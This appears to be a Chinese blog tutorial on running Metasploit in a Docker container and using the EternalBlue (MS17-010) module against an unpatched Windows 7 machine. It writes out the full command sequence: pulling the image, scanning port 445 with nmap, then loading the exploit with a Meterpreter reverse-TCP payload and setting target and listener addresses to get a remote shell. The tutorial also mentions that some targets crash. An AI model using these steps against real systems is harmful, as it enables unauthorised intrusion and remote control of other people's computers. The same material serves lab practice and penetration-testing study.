Metasploit的Docker安装及其Eternal Blue(永恒之蓝)渗透实现

在Docker上pull下来的msf是默认已带有ms17_010_eternalblue利用模块的,这里就简单地演示一遍该模块来获取win7的shell(当然示例的win7没有打补丁且开启了445端口)。

Pull并安装msf容器:

先查找docker上的Metasploit镜像:

docker search metasploit


选择第一个pull就好:

docker pull linuxkonsult/kali-metasploit

然后docker images即可查看到pull下来的镜像了。

创建容器:

docker run -it -d --name msf -p 1234:1234 linuxkonsult/kali-metasploit

进入容器:

docker exec -it id /bin/bash


下面就是msf Eternal Blue模块的利用:

使用nmap扫描目标主机操作系统类型以及是否开放445端口:

nmap -O -p445 ip

Metasploit的Docker安装及其Eternal Blue(永恒之蓝)渗透实现_第1张图片

显示OS最可能为win7且445端口是开启的。


利用ms17_010_eternalblue模块进行渗透:

打开msf框架:

msfconsole

使用ms17_010_eternalblue模块及各个配置:

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

show options

set rhost 目标主机IP

set lhost 监听的主机IP(在这里是docker主机的IP)

set lport 监听的端口(示例中为设置的映射的端口1234)

exploit

Metasploit的Docker安装及其Eternal Blue(永恒之蓝)渗透实现_第2张图片

更多关于meterpreter的操作,可直接通过help参数即可了解。

当然,有的机子是不会反弹shell的,因为直接蓝屏了~

你可能感兴趣的:(Metasploit,渗透,Docker)